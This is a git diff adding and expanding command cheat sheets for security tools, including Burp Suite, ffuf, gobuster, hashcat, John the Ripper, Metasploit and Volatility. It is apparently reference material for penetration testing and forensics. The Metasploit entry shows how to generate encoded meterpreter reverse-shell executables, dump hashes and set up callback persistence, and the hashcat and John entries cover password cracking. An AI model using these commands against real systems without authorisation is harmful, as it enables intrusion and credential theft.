diff --git a/burpsuite b/burpsuite
new file mode 100644
index 0000000..c2af7fb
--- /dev/null
+++ b/burpsuite
@@ -0,0 +1,43 @@
+# Proxy Configuration
+# Configure browser to use proxy: 127.0.0.1:8080
+# Install Burp's CA Certificate in browser
+
+# Scoping
+# Target > Scope > Add to scope
+# Filter proxy traffic: Proxy > Options > Intercept Client Requests > And URL Is in target scope
+
+# Scanning
+# Target > Site map > Select host > Right click > Active Scan
+# Scanner > Options > Configure scan settings
+
+# Intruder Attack Types
+# Sniper: Single position, one wordlist
+# Battering ram: Multiple same positions, one wordlist
+# Pitchfork: Multiple positions, multiple wordlists
+# Cluster bomb: Multiple positions, multiple wordlists (all combinations)
+
+# Common Payloads
+# Intruder > Payloads
+# Simple list: wordlist
+# Runtime file: generated payloads
+# Custom iterator: complex patterns
+# Extension-generated: programmatic payloads
+
+# Session Handling
+# Project options > Sessions
+# Rules for managing cookies, tokens
+# Macros for automated actions
+
+# Extensions
+# Extender > BApp Store
+# Popular extensions:
+# - JWT Editor
+# - AuthMatrix
+# - Turbo Intruder
+# - Logger++
+
+# Advanced Features
+# Comparer: Compare requests/responses
+# Decoder: Encode/decode data
+# Sequencer: Analyze token randomness
+# Collaborator: Test OAST vulnerabilities
\ No newline at end of file
diff --git a/dig b/dig
index fbddcef..506a164 100644
--- a/dig
+++ b/dig
@@ -1 +1,48 @@
-#To run dig (domain information groper)
dig [domain]

#To just get the ip address
dig [domain] +nocomments +noauthority +noadditional +nostats 
OR
dig [domain] +noall +answer
OR
dig [domain] +short

#To use a specific query type
dig -t [query type] [domain] [options]
OR
dig [domain] [query type] [options]

#To view ALL DNS record types use query ANY
dig -t ANY [domain] [options]
OR
dig [domain] ANY [options]

#To do a DNS reverse look up 
dig -x [ip address] +short

#To use a specific DNS server
dig @[specific DNS] [domain]

#To do a bulk DNS query (where file.txt has all the domains, one to a line)
dig [domain1] [options] [domain2] [options]
OR
dit -f file.txt [options]
\ No newline at end of file
+# To run dig (domain information groper)
+dig [domain]
+
+# To just get the ip address
+dig [domain] +nocomments +noauthority +noadditional +nostats
+# OR
+dig [domain] +noall +answer
+# OR
+dig [domain] +short
+
+# To use a specific query type
+dig -t [query type] [domain] [options]
+# OR
+dig [domain] [query type] [options]
+
+# To view ALL DNS record types use query ANY
+dig -t ANY [domain] [options]
+# OR
+dig [domain] ANY [options]
+
+# To do a DNS reverse look up 
+dig -x [ip address] +short
+
+# To use a specific DNS server
+dig @[specific DNS] [domain]
+
+# To do a bulk DNS query (where file.txt has all the domains, one to a line)
+dig [domain1] [options] [domain2] [options]
+# OR
+dig -f file.txt [options]
+
+# To trace the DNS lookup path
+dig +trace [domain]
+
+# To query specific record types
+dig [domain] A     # IPv4 addresses
+dig [domain] AAAA  # IPv6 addresses
+dig [domain] MX    # Mail servers
+dig [domain] NS    # Name servers
+dig [domain] TXT   # TXT records
+dig [domain] SOA   # Start of Authority
+dig [domain] CNAME # Canonical name
+
+# To set timeout and number of retries
+dig +time=5 +tries=2 [domain]
+
+# To use TCP instead of UDP
+dig +tcp [domain]
\ No newline at end of file
diff --git a/ffuf b/ffuf
new file mode 100644
index 0000000..619c4c6
--- /dev/null
+++ b/ffuf
@@ -0,0 +1,34 @@
+# Basic directory fuzzing
+ffuf -w wordlist.txt -u http://target/FUZZ
+
+# Multiple parameters fuzzing
+ffuf -w params.txt:PARAM -w values.txt:VAL -u http://target/script.php?PARAM=VAL
+
+# Headers fuzzing
+ffuf -w wordlist.txt -u http://target -H "FUZZ: value"
+
+# POST data fuzzing
+ffuf -w wordlist.txt -X POST -d "username=admin\&password=FUZZ" -u http://target
+
+# Filter responses
+# Match size
+ffuf -w wordlist.txt -u http://target/FUZZ -fs 4242
+# Match words
+ffuf -w wordlist.txt -u http://target/FUZZ -fw 42
+# Match lines
+ffuf -w wordlist.txt -u http://target/FUZZ -fl 42
+# Match time
+ffuf -w wordlist.txt -u http://target/FUZZ -ft 2.42
+
+# Custom matching
+# Match status codes
+ffuf -w wordlist.txt -u http://target/FUZZ -mc 200,204,301,302,307,401
+# Match regular expressions
+ffuf -w wordlist.txt -u http://target/FUZZ -mr "admin"
+
+# Rate limiting
+ffuf -w wordlist.txt -u http://target/FUZZ -p 0.1
+
+# Output formats
+ffuf -w wordlist.txt -u http://target/FUZZ -o results.json
+# Supported formats: json, ejson, html, md, csv, ecsv
\ No newline at end of file
diff --git a/gobuster b/gobuster
new file mode 100644
index 0000000..9613247
--- /dev/null
+++ b/gobuster
@@ -0,0 +1,50 @@
+# Directory Enumeration
+# Basic directory scan
+gobuster dir -u http://target -w wordlist.txt
+
+# Advanced Options
+# With file extensions
+gobuster dir -u http://target -w wordlist.txt -x php,txt,html
+
+# With custom status codes
+gobuster dir -u http://target -w wordlist.txt -s 200,204,301,302,307,401,403
+
+# With custom threads
+gobuster dir -u http://target -w wordlist.txt -t 50
+
+# With custom timeout
+gobuster dir -u http://target -w wordlist.txt --timeout 30s
+
+# DNS Enumeration
+# Basic DNS scan
+gobuster dns -d example.com -w wordlist.txt
+
+# With specific resolver
+gobuster dns -d example.com -w wordlist.txt -r 8.8.8.8
+
+# VHOST Enumeration
+# Basic vhost scan
+gobuster vhost -u http://target -w wordlist.txt
+
+# With custom headers
+gobuster vhost -u http://target -w wordlist.txt -H 'User-Agent: CustomAgent'
+
+# Advanced Features
+# Pattern matching
+gobuster dir -u http://target -w wordlist.txt -p pattern
+
+# Custom cookies
+gobuster dir -u http://target -w wordlist.txt -c 'session=123456'
+
+# Basic auth
+gobuster dir -u http://target -w wordlist.txt -U username -P password
+
+# Output formats
+gobuster dir -u http://target -w wordlist.txt -o output.txt
+gobuster dir -u http://target -w wordlist.txt -o output.json -f json
+
+# Wildcard detection
+gobuster dir -u http://target -w wordlist.txt --wildcard
+
+# Custom User-Agent
+gobuster dir -u http://target -w wordlist.txt -a 'CustomUserAgent/1.0'
\ No newline at end of file
diff --git a/hashcat b/hashcat
new file mode 100644
index 0000000..26bb3d2
--- /dev/null
+++ b/hashcat
@@ -0,0 +1,45 @@
+# Basic Usage
+hashcat -m <hash-type> -a <attack-mode> <hash-file> <wordlist>
+
+# Common Hash Types (-m)
+# 0: MD5
+# 100: SHA1
+# 1000: NTLM
+# 1800: sha512crypt $6$
+# 3200: bcrypt
+# 5600: NetNTLMv2
+
+# Attack Modes (-a)
+# 0: Straight (wordlist)
+# 1: Combination
+# 3: Brute-force
+# 6: Hybrid Wordlist + Mask
+# 7: Hybrid Mask + Wordlist
+
+# Mask Attack Examples
+# ?l = abcdefghijklmnopqrstuvwxyz
+# ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
+# ?d = 0123456789
+# ?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
+# ?a = ?l?u?d?s
+hashcat -a 3 -m 0 hash.txt ?l?l?l?l?l?l?l?l
+
+# Rule-based Attack
+hashcat -a 0 -m 0 hash.txt wordlist.txt -r rules/best64.rule
+
+# Show Cracked Passwords
+hashcat -m 0 hash.txt --show
+
+# Benchmark
+hashcat -b
+
+# Session Management
+# Start new session
+hashcat --session name
+# Restore session
+hashcat --session name --restore
+
+# Performance Tuning
+# Workload profile (-w)
+# 1: Low, 2: Default, 3: High, 4: Nightmare
+hashcat -w 3
\ No newline at end of file
diff --git a/john b/john
index 091986d..7e3b9ed 100644
--- a/john
+++ b/john
@@ -1 +1,44 @@
-#To show the types of passwords that John can crack with crack speed (in cracks/second)
john --test

#To use your own word list (the Rockyou list is suggested)
john --wordlist=[filename] [passwordfile]

#To show your results after running john (shows ~/.john/john.pot)
john --show

#To restore an interrupted john session
john --restore
\ No newline at end of file
+# To show the types of passwords that John can crack with crack speed (in cracks/second)
+john --test
+
+# To use your own word list (the Rockyou list is suggested)
+john --wordlist=[filename] [passwordfile]
+
+# To show your results after running john (shows ~/.john/john.pot)
+john --show
+
+# To restore an interrupted john session
+john --restore
+
+# To use a specific format for cracking
+john --format=<format> [passwordfile]
+
+# Common formats:
+# raw-md5, raw-sha1, raw-sha256, raw-sha512
+# mysql, mysql-sha1
+# nt, lm
+# crypt
+
+# To use rules while cracking
+john --rules --wordlist=[filename] [passwordfile]
+
+# To use mask attack
+john --mask='?l?l?l?l?l?d?d' [passwordfile]
+
+# To use incremental mode
+john --incremental [passwordfile]
+
+# To use multiple cores
+john --fork=4 [passwordfile]
+
+# To list all available formats
+john --list=formats
+
+# To show cracking status
+john --status
+
+# To create custom rules
+# Add to john.conf:
+# [List.Rules:Custom]
+# $[0-9]$[0-9]
+john --wordlist=[filename] --rules:Custom [passwordfile]
\ No newline at end of file
diff --git a/metasploit b/metasploit
index ee58e17..c759683 100644
--- a/metasploit
+++ b/metasploit
@@ -1,26 +1,82 @@
-# To show all exploits that for a vulnerability
+# Basic Usage
+# Start metasploit console
+msfconsole
+
+# Show all exploits for a vulnerability
 grep <vulnerability> show exploits
 
-# To select an exploit to use
+# Select an exploit to use
 use <exploit>
 
-# To see the current settings for a selected exploit
+# Show current settings for selected exploit
 show options
 
-# To see compatible payloads for a selected exploit
+# Show compatible payloads for selected exploit
 show payloads
 
-# To set the payload for a selected exploit
+# Set the payload for selected exploit
 set payload <payload>
 
-# To set setting for a selected exploit 
+# Set setting for selected exploit 
 set <option> <value>
 
-# To run the exploit
+# Run the exploit
 exploit
 
-# One liner to create/generate a payload for windows
-msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=<listening_host> LPORT=<listening_port> --bad-chars “\x00” --encoder x86/shikata_ga_nai --iterations 10 --format exe --out /path/
+# Advanced Usage
+# Search for specific exploits/modules
+search type:exploit platform:windows ms17-010
+
+# Use advanced options
+set ADVANCED true
+show advanced
+
+# Generate shellcode
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
+
+# Payload Encoding
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -e x86/shikata_ga_nai -i 10 -f exe > encoded_shell.exe
+
+# Post Exploitation
+# Get system info
+sysinfo
+
+# Dump hashes
+hashdump
+
+# Upload/Download files
+upload <local_file> <remote_destination>
+download <remote_file> <local_destination>
+
+# Port forwarding
+portfwd add -l <local_port> -p <remote_port> -r <remote_host>
+
+# Pivoting
+route add <subnet> <netmask> <session>
+
+# Persistence
+run persistence -X -i 5 -p 443 -r <remote_host>
+
+# Load extensions
+load <extension_name>
+
+# Database Operations
+# Connect to database
+db_connect <username>:<password>@<host>:<port>/<database>
+
+# Import scan results
+db_import <file>
+
+# Show hosts/services
+hosts
+services
+
+# Workspace management
+workspace -a <name>
+workspace <name>
 
-# One liner start meterpreter
-msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <listening_host>;set LPORT <listening_port>;run;"
+# Resource Scripts
+# Create and run resource scripts
+echo "use exploit/multi/handler" > script.rc
+echo "set payload windows/meterpreter/reverse_tcp" >> script.rc
+resource script.rc
\ No newline at end of file
diff --git a/nuclei b/nuclei
new file mode 100644
index 0000000..67cfd76
--- /dev/null
+++ b/nuclei
@@ -0,0 +1,57 @@
+# Basic Scanning
+# Scan single URL
+nuclei -u https://target.com
+
+# Scan multiple URLs
+nuclei -l urls.txt
+
+# Template Selection
+# Scan with specific templates
+nuclei -u https://target.com -t cves/,exposures/
+
+# Exclude templates
+nuclei -u https://target.com -exclude-templates panels/
+
+# Severity based scanning
+nuclei -u https://target.com -severity critical,high
+
+# Rate Limiting
+# Requests per second
+nuclei -u https://target.com -rate-limit 100
+
+# Bulk size
+nuclei -u https://target.com -bulk-size 25
+
+# Advanced Features
+# Automatic web crawling
+nuclei -u https://target.com -crawler
+
+# Custom headers
+nuclei -u https://target.com -H "User-Agent: CustomBot"
+
+# Authentication
+nuclei -u https://target.com -auth "Bearer token"
+
+# Output formats
+nuclei -u https://target.com -o results.txt
+nuclei -u https://target.com -json -o results.json
+
+# Interactsh correlation
+nuclei -u https://target.com -interactsh-url url
+
+# Debugging
+# Debug mode
+nuclei -u https://target.com -debug
+
+# Verbose output
+nuclei -u https://target.com -v
+
+# Template Development
+# Generate template
+nuclei -u https://target.com -generate
+
+# Validate template
+nuclei -validate
+
+# Update templates
+nuclei -update-templates
\ No newline at end of file
diff --git a/volatility b/volatility
new file mode 100644
index 0000000..9fda0c4
--- /dev/null
+++ b/volatility
@@ -0,0 +1,65 @@
+# Basic Memory Analysis
+# List available plugins
+volatility -h
+
+# Get image info
+volatility -f <memory_file> imageinfo
+
+# Process listing
+volatility -f <memory_file> pslist
+volatility -f <memory_file> pstree
+volatility -f <memory_file> psxview
+
+# Network information
+volatility -f <memory_file> netscan
+volatility -f <memory_file> connections
+volatility -f <memory_file> connscan
+
+# Registry Analysis
+# Registry hives
+volatility -f <memory_file> hivelist
+# Registry keys
+volatility -f <memory_file> printkey -K "Software\Microsoft\Windows\CurrentVersion\Run"
+
+# Malware Analysis
+# Find hidden processes
+volatility -f <memory_file> psxview
+
+# Detect injected code
+volatility -f <memory_file> malfind
+
+# Dump suspicious processes
+volatility -f <memory_file> procdump -p <PID> --dump-dir ./
+
+# Extract files
+# Dump files from memory
+volatility -f <memory_file> dumpfiles --dump-dir ./
+# Extract registry
+volatility -f <memory_file> dumpregistry --dump-dir ./
+
+# Timeline Analysis
+# Create timeline
+volatility -f <memory_file> timeliner
+
+# Memory Artifacts
+# Command history
+volatility -f <memory_file> cmdscan
+volatility -f <memory_file> consoles
+
+# Password dump
+volatility -f <memory_file> hashdump
+volatility -f <memory_file> lsadump
+
+# Advanced Analysis
+# Detect rootkits
+volatility -f <memory_file> rootkit_scan
+
+# Analyze kernel modules
+volatility -f <memory_file> modules
+volatility -f <memory_file> modscan
+
+# Handle analysis
+volatility -f <memory_file> handles -p <PID>
+
+# Memory sections
+volatility -f <memory_file> memmap -p <PID>
\ No newline at end of file